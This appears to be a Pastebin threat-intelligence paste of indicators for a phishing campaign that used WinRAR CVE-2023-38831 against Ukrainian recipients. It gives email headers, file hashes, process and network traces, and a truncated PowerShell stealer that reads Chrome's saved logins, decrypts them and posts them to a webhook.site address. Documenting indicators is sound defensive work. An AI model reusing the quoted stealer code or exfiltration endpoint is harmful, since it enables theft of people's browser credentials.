Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #RAR #202338831 #CMD #Powershell
- https://pastebin.com/APaRNDHd
- previous_contact:
- n/a
- FAQ:
- https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164/
- attack_vector
- --------------
- email attach .RAR (exploit) > .xlsx .cmd > a.ps1 > powershell > exfil
- # # # # # # # #
- email_headers
- # # # # # # # #
- Return-Path: <management@abcosteel.com>
- Received: from server.abcosteel.com (server.abcosteel.com [108.175.163.195])
- Received: from [185.195.19.200] (port=44932 helo=[127.0.1.1]) by server.abcosteel.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.93)
- From: cyber_alerts <management@abcosteel.com>
- Subject: Нові індикатори кіберзагроз
- Message-Id: <20230830131505.37UDF5QT031908@abcosteel.com>
- Date: Wed, 30 Aug 2023 13:15:05 +0300
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 f5b5148acf4bc340b316f527c4a378f9ba51d06abe3062dcbc62bcd9954d86c9
- File name IOC_30_08.rar [ WinRAR CVE-2023-38831 ]
- File size 13.71 KB (14044 bytes)
- SHA-256 ce406bd003cbb998988a51b75b2c55b45a0e818924f6adaa783d9077375db1dc
- File name IOC_30_08.xlsx .cmd
- File size 23.79 KB (24363 bytes)
- SHA-256 363039a76125c64bf01a6694f8a3b806a832df68b442a0ce4ad76cf565678648
- File name a.ps1
- File size 18.96 KB (19418 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR email_attach
- C2 http://webhook.site/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6
- netwrk
- --------------
- 46.4.105{ .116 webhook{ .site 80 HTTP POST /e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
- 46.4.105{ .116 webhook{ .site 80 HTTP POST /e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
- comp
- --------------
- powershell.exe 46.4.105{ .116 80
- proc
- --------------
- "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\operator\Desktop\IOC_30_08.rar"
- C:\Windows\system32\cmd.exe /c ""C:\tmp\Rar$DIa948.23332\IOC_30_08.xlsx .cmd" "
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-ExecutionPolicy Unrestricted -scope CurrentUser; .\a.ps1
- "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe del .\a.ps1
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand "QQBkAGQALQBUAHkAc
- persist
- --------------
- n/a
- drop
- --------------
- %temp%\Rar$DIa948.23332\IOC_30_08.xlsx .cmd
- %temp%\example.xlsx
- C:\Users\%name%\Desktop\a.ps1
- C:\Users\%name%\AppData\Roaming\Microsoft\Office\Последние файлы\example.xlsx.LNK
- # # # # # # # #
- additional info
- # # # # # # # #
- Add-Type -AssemblyName System.Text.Encoding; Add-Type -AssemblyName System.Security; $hook="http://webhook.site/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6"; $dataPath="$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default\\Login Data"; $localStatePath = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Local State"; ....
- :Unprotect($master_key_encoded[5..$master_key_encoded.length], $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $loginDataContent = [convert]::ToBase64String((Get-Content -path $dataPath -Encoding byte)); $postParams = @{k
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/f5b5148acf4bc340b316f527c4a378f9ba51d06abe3062dcbc62bcd9954d86c9/details
- https://www.virustotal.com/gui/file/ce406bd003cbb998988a51b75b2c55b45a0e818924f6adaa783d9077375db1dc/details
- https://analyze.intezer.com/analyses/a3975e5f-16b9-4942-b68d-bbb12fde9003/genetic-analysis
- https://www.virustotal.com/gui/file/363039a76125c64bf01a6694f8a3b806a832df68b442a0ce4ad76cf565678648/details
- VR
Add Comment
Please, Sign In to add comment